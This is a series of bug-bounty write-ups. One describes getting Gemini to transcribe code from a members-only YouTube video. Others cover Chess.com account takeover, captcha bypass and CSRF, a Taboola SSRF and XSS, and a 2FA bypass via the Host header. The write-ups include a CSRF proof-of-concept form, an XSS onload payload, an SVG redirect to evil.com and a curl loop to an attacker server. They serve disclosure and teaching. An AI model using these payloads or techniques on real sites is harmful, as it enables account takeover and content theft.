I tested this using Google AI Studio.

My first prompt was:

Print all details and subtitles separately like
[Visual]
[Subtitle]
Print each [Visual] and [Subtitle] alongside by timestamp.
https://www.youtube.com/watch?v=D1QdCusWu8M

The output was not accurate.

At that time, Gemini was on version 2.0. A week later, version 2.5 was released with a new feature: a dedicated YouTube tool that allows you to attach video links directly.

I tried again. Gemini 2.5 treated the links differently, and the output was exactly what I expected. It printed the subtitles and described the video frame by frame.

Since the video was about developing a Caido plugin, I tried to fetch the code from a specific time using this prompt:

print javascript code at 0m52s693ms - 0m56s333ms

The result was:

> var script = document.createElement('script');
  script.src = 'https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js';
  script.addEventListener('load', function() {
      window.getCookie = function(name) {
          var match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
          if (match) return match[2];

I reported this bug to the Google Bug Bounty program and was awarded $1,337.

Original report:

Access to members only YouTube video content | Google Bug Hunters

Access to members-only YouTube video content was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Hi folks, this is the second write-up about finding bugs on Chess.com. You can find the first one here.
Chess.com is the most famous website for playing & learning chess.

You can log in to the site by two parameters, the first one is your email and the second one is your username. This story learn us to check all features and look for anomalies on each feature.
I’ve found that if you change your password, it changes just for one parameter (email) and after changing the password you can’t log in by your username and new password. In fact, the changes apply just to email and new password changes after 10 minutes on the username. So if your password leaks and you change your password, someone who has your password can log in after changing your password by username and old password. The process of update query for changing the password is like the following image:

After sending this bug to Chess.com, they said this delay was for replication and was temporary. I checked it tomorrow and the bug existed!
Finally, the report scored at 3.5 based on CVSS

In more investigating, I find that after 10 minutes session won’t expire! Checked the change password form and there wasn’t any rate limit! BOOM!!!

By using burp intruder ran a brute force attack and found the new password. I escalated the bug to full account takeover.

The report scored at 4.4 based on CVSS and they increased bounty to $400.

You can find me on Twitter by the following link:

https://twitter.com/seqrity9

10 golden minutes for taking over a Chess.com account was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

Hi hunters and folks, I’m a chess lover and almost use Chess.com everyday but I’m not pro 😉

Chess.com is the #1 online chess website and has an internal bug bounty program but I think they should more clarify some points in their policy and update it every month. It would be better if they use bug bounty platforms like HackerOne.

They’re really friendly in communication but stricter than H1 triagers for accepting bugs and pay bounty.

Don’t rely on one tool

The hunting story started one day on login page, Chess.com redirected me to another page for solving Cloudflare hCaptcha. I think, It was for using my VPS IP on login page by proxy and Cloudflare had placed my IP in graylist.
I’ve used HTTP Header Live sometimes and in this case use it too. After login the server will redirect user to the following link for solving Captcha:

https://www.chess.com/login_check

The HTTP Header Live intercepts requests like Burp. If you click on a request a window will appear on screen and you can change or resend request.

In this case request was POST and my username and password was in body. I’ve just resend it and the following page loaded!

After clicking on Home button the hCAPTCHA bypasses and you can login without solving the captcha because hCAPTCHA has a misconfiguration on the server. You can’t reproduce these steps by Burp because HTTP Header Live uses blob URL(Look at address bar in the image above).
So don’t rely on one tool!!!

Test all functions in applications

There are two methods for loging in to Chess.com. The first one is via username and the second one is via email. If you enter wrong password more than 10 times you have to solve a captcha. But what’s the bug?

In fact there was a misconfiguration on login page via email which after entering 10 wrong attempts login the captcha doesn’t appear and an attacker can run brute-force attack for each user leads to lock victim’s account.

If the user uses mobile app will see the following error:

The user should login on the Chess.com website and solve the Captcha for unlocking the account.

So as a bug hunter, you should test all functions on the application.

Checking CSRF’s deeply

There is a function in Chess.com that you can login via Google,Facebook,… accounts but there is a problem there.

You can disconnect from those accounts from the setting menu and the bug still stays there.

When the user clicks on disconnect button, a POST request sends to server like the following image:

But after sending this POST request nothing happens!

It seems everything is correct! These kind of requests should send a POST request with a token. Logic is true but answer is in the next request.

In fact, POST request does nothing and next GET request disconnect the user from Google account.

So, any attacker can send just a link for victims then the victims will disconnect from their account or use the following code for hosting CSRF file:

<html>
<body>

<form action="https://www.chess.com/settings/google/disconnect"><input type="submit" value="Submit request" />
</form>

<script>
document.forms[0].submit();
</script>

</body>
</html>

So think out of the box and review all the requests. Maybe happen a weird thing that you don’t expect it.

You can find me on twitter by the following link:

https://twitter.com/seqrity9

Finding bugs on Chess.com was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

As a security lover, I always take a look at everywhere I can 😁

Just right-click on ads and find a juicy endpoint by Inspect Element. An endpoint fetch pictures from the Taboola CDN.

https://images.taboola.com/taboola/image/fetch/

If you insert an external URL image after this endpoint, the Taboola server will process and show the picture. The Taboola won’t check that image is whether from it’s CDN or not!

What happen If I send a request from Taboola by this endpoint to my server? So I did it and found the Taboola internal IPs.

I’ve prepared my server by the following command for listening on port 8000

python -m SimpleHTTPServer 8000

And from my PC send multiple requests to server by the following code:

for number in {1..100}
do curl -i https://images.taboola.com/taboola/image/fetch/http://SERVER_IP:8000/$number
done

And responses were amazing!!!

The Taboola uses Fastly CDN and whenever you ping images.taboola.com, you will receive the following response:

ping images.taboola.com
PING tls13.taboola.map.fastly.net (151.101.193.44) 56(84) bytes of data.

But I found internal IPs from Amazon!!!

So, With this juicy endpoint you can run DOS Attack on behalf the Taboola servers.

In addition, these servers had open ports on 22 and 80 and there were two CVEs on one of them.

Maybe you’ve thought that this endpoint processes images and maybe accepts SVG images 😉

Find an SVG image and open it by a text editor. Add the following code and upload it on the Internet.

Finally, we have this link:

https://images.taboola.com/taboola/image/fetch/https://www.linkpicture.com/q/dog.svg

Unfortunately, the endpoint doesn’t process SVG images properly and browser will download the file. But if you use Chrome or IE and click on downloaded image for opening the image, you will redirect to evil.com

You can change payload in SVG file to the following code for executing XSS:

onload='alert("XSS")'

I’ve found these bugs on the Taboola and sent email to the support team on March 2020. They didn’t respond to me until now!

My Twitter: https://twitter.com/seqrity9

A juicy endpoint on the Taboola leads to reveal internal IPs and XSS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

In the recon process, I’ve found that two websites are the same :

www.domain.com
beta.domain.com

2FA was enabled on www.domain.com, and when you create an account on this domain, you can log in on beta.domain.com without entering the 2FA code.

By default, the 2FA was disabled. So, I‘ve decided to try bypassing 2FA and enabling it on www.domain.com. After entering the username and password, you should enter 6 characters (digits and chars), and after 5 minutes, the code will be expired. Therefore, brute force doesn’t work here.

Open Burp and intercept request after entering a password, and change Host header to beta.domain.com

Enter 000000 in twofactorcode field

And forward request, BOOOM.

I successfully logged in to www.domain.com without entering the correct code.

Report: 14 May 2020

Fixed: 15 May 2020

First Response: 19 May 2020

Bounty: They didn’t pay bounty and said our developers fix that before reviewing your report!!!

My Twitter: https://twitter.com/seqrity9

Bypass 2FA like a Boss was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.